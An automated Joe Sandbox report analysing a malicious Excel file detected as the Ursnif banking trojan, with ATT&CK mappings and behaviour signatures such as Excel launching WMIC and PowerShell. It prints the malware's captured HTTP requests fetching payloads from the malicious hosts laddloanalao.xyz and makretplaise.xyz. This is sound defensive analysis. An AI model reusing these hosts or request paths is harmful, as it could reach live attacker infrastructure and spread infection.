Play interactive tour

Edit tour

Analysis Report MIL0001742828.xls

Overview

General Information

Joe Sandbox Version:	28.0.0 Lapis Lazuli
Analysis ID:	194688
Start date:	09.12.2019
Start time:	17:28:51
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MIL0001742828.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.expl.evad.winXLS@37/56@16/4
EGA Information:	Successful, ratio: 50%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 13
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to Italian - Italy Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 40.90.247.210, 40.91.124.111, 192.35.177.64, 67.27.157.254, 8.248.113.254, 8.248.115.254, 67.27.159.254, 67.26.81.254, 8.253.207.120, 8.253.95.249, 8.248.127.254, 67.27.158.126, 172.217.23.238, 216.58.201.100, 72.21.81.200, 152.199.19.161, 13.107.4.50, 13.107.5.80, 204.79.197.200, 13.107.21.200 Excluded domains from analysis (whitelisted): www.bing.com, google.com, update.microsoft.com, ie9comview.vo.msecnd.net, dual-a-0001.a-msedge.net, api.bing.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, r20swj13mr.microsoft.com, iecvlist.microsoft.com, e-0001.e-msedge.net, au.au-msedge.net, www.update.microsoft.com.nsatc.net, a-0001.a-afdentry.net.trafficmanager.net, update.microsoft.com.nsatc.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, www.google.com, au.c-0001.c-msedge.net, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, api-bing-com.e-0001.e-msedge.net, cs9.wpc.v0cdn.net Execution Graph export aborted for target mshta.exe, PID 3584 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	100	0 - 100		false	Ursnif

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Impact
Valid Accounts	Windows Management Instrumentation211	Winlogon Helper DLL	Process Injection112	Rundll321	Credential Dumping	System Time Discovery1	Remote File Copy2	Email Collection1	Data Encrypted11	Remote File Copy2	Data Destruction
Replication Through Removable Media	Rundll321	Port Monitors	Accessibility Features	Scripting2	Network Sniffing	Account Discovery1	Remote Services	Clipboard Data3	Exfiltration Over Other Network Medium	Standard Cryptographic Protocol12	Data Encrypted for Impact
External Remote Services	PowerShell3	Accessibility Features	Path Interception	Obfuscated Files or Information1	Input Capture	Security Software Discovery111	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Non-Application Layer Protocol3	Disk Structure Wipe
Drive-by Compromise	Scripting2	System Firmware	DLL Search Order Hijacking	Masquerading11	Credentials in Files	File and Directory Discovery3	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol3	Disk Content Wipe
Exploit Public-Facing Application	Execution through API1	Shortcut Modification	File System Permissions Weakness	Virtualization/Sandbox Evasion3	Account Manipulation	System Information Discovery37	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol	Service Stop
Spearphishing Link	Exploitation for Client Execution1	Modify Existing Service	New Service	Process Injection112	Brute Force	Process Discovery2	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port	Inhibit System Recovery
Spearphishing Attachment	Graphical User Interface1	Path Interception	Scheduled Task	Software Packing	Two-Factor Authentication Interception	Application Window Discovery1	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port	Defacement
Spearphishing via Service	Command-Line Interface111	Logon Scripts	Process Injection	Indicator Blocking	Bash History	System Owner/User Discovery1	Remote Desktop Protocol	Clipboard Data	Exfiltration Over Alternative Protocol	Standard Application Layer Protocol	Stored Data Manipulation
Supply Chain Compromise	Rundll32	DLL Search Order Hijacking	Service Registry Permissions Weakness	Process Injection	Input Prompt	Remote System Discovery11	Windows Admin Shares	Automated Collection	Exfiltration Over Physical Medium	Multilayer Encryption	Transmitted Data Manipulation
Trusted Relationship	PowerShell	Change Default File Association	Exploitation for Privilege Escalation	Scripting	Keychain	System Network Configuration Discovery1	Taint Shared Content	Audio Capture	Transfer Data to Cloud Account	Connection Proxy	Runtime Data Manipulation

Signature Overview

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: MIL0001742828.xls

Virustotal: Detection: 16%

Perma Link

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 8_2_00451098 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

8_2_00451098

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\wbem\WMIC.exe

Jump to behavior

Networking:

Creates a COM Internet Explorer object

Show sources

Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\System32\PING.EXE 'C:\Windows\system32\PING.EXE' update.microsoft.com

IP address seen in connection with other malware

Show sources

Source: Joe Sandbox View

IP Address: 216.58.201.101 216.58.201.101

JA3 SSL client fingerprint seen in connection with other malware

Show sources

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97AC40E5.emf

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /images/sCdH2p9rC/QEWUjhcskJhtMW9G0Ob3/8ujas9efG6k7NSOXraz/KyFwMBjnUtN0zWrGl7dzfE/Iz2JvLTs0tQal/txJUM0Zx/znIHrFkN_2FASixt6Ws7SB8/xgoZDz4pOc/2RHMQbhDsoScncwUV/_2FIDsyvf/XXEf.avi HTTP/1.1Accept: text/html, application/xhtml+xml, /Accept-Language: it-ITUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: laddloanalao.xyzDNT: 1Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: laddloanalao.xyzDNT: 1Connection: Keep-AliveCookie: PHPSESSID=m8dpt3lkbmq7bj50qjk4viijg2; lang=en
Source: global traffic	HTTP traffic detected: GET /images/New4cJoQvo6XtZauz/hyuqnQVHdttc/Y2fQhP_2Bvp/SwIcLle_2BgVQD/gNevLmBadoMS_2F8_2Fy6/0rM_2F8LRwLuw_2F/EauVHxmISOjoYNN/_2FY7T2el_2BlMSeFW/_2FLqyftu/fwXJdY6tuyVXii_2F47H/XDlyh_2Ba2Ay8g_2F35/F_2BBnVFrTiBOxAVL_2F4w/hBVHp.avi HTTP/1.1Accept: text/html, application/xhtml+xml, /Accept-Language: it-ITUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: laddloanalao.xyzDNT: 1Connection: Keep-AliveCookie: lang=en
Source: global traffic	HTTP traffic detected: GET /images/eD_2B_2BIP/yNYJLi3riY9RVC043/FKTGoU_2Bwca/7_2F5IlR9_2/Bxvd12wxNAN5Gm/_2FQuaC3_2Fxa1vUkyrfx/Az2y6e0NYX2pVPdP/5Lep5J1iYneZptK/H8TVkb4hqL5pkBrsve/iv65eT52g/BN6C1a3r5J1hy/7VNxiHcx.avi HTTP/1.1Accept: text/html, application/xhtml+xml, /Accept-Language: it-ITUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: laddloanalao.xyzDNT: 1Connection: Keep-AliveCookie: lang=en
Source: global traffic	HTTP traffic detected: GET /images/oTpJ2ZzMtV7la/idgCkWlk/5O2cre58fBwiiKKlpjSXnNE/VvKgyAjcjl/LYYg0XGo4i5LMQjA0/0J_2BCAZ4WoH/vBCfv9hNgac/UYRVYJJYgup4QM/vBNZmgcRevebGCEZj413g/OVOtHkbj1c/mNgLxAUcKR/XQq.avi HTTP/1.1Accept: text/html, application/xhtml+xml, /Accept-Language: it-ITUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: laddloanalao.xyzDNT: 1Connection: Keep-AliveCookie: lang=en

Found strings which match to known social media urls

Show sources

Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: makretplaise.xyz

Urls found in memory or binary data

Show sources

Source: explorer.exe, 0000001E.00000000.2709755777.08AA0000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.4.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.2709755777.08AA0000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: {5A5B55D3-1AA1-11EA-B7AC-B2C276BF9C88}.dat.10.dr	String found in binary or memory: http://google.com/images/fi1j95CwZU0jZr7eERDjR/LYTX_2B_2Bt1aKsV/MbJnpGbtjjp3sbi/hxvIjD_2BIIaFnpDWx/1
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: imagestore.dat.15.dr	String found in binary or memory: http://laddloanalao.xyz/favicon.ico
Source: imagestore.dat.15.dr	String found in binary or memory: http://laddloanalao.xyz/favicon.ico~
Source: {75AD5703-1AA1-11EA-B7AC-B2C276BF9C88}.dat.18.dr	String found in binary or memory: http://laddloanalao.xyz/images/New4cJoQvo6XtZauz/hyuqnQVHdttc/Y2fQhP_2Bvp/SwIcLle_2BgVQD/gNevLmBadoM
Source: explorer.exe, 0000001E.00000000.2692377330.08110000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.2610098055.03A39000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.2644750191.076B6000.00000004.00000001.sdmp, ~DF00A1094E21FFE937.TMP.15.dr, {7436F613-1AA1-11EA-B7AC-B2C276BF9C88}.dat.15.dr	String found in binary or memory: http://laddloanalao.xyz/images/sCdH2p9rC/QEWUjhcskJhtMW9G0Ob3/8ujas9efG6k7NSOXraz/KyFwMBjnUtN0zWrGl7
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 0000001E.00000000.2609903529.03950000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.m
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
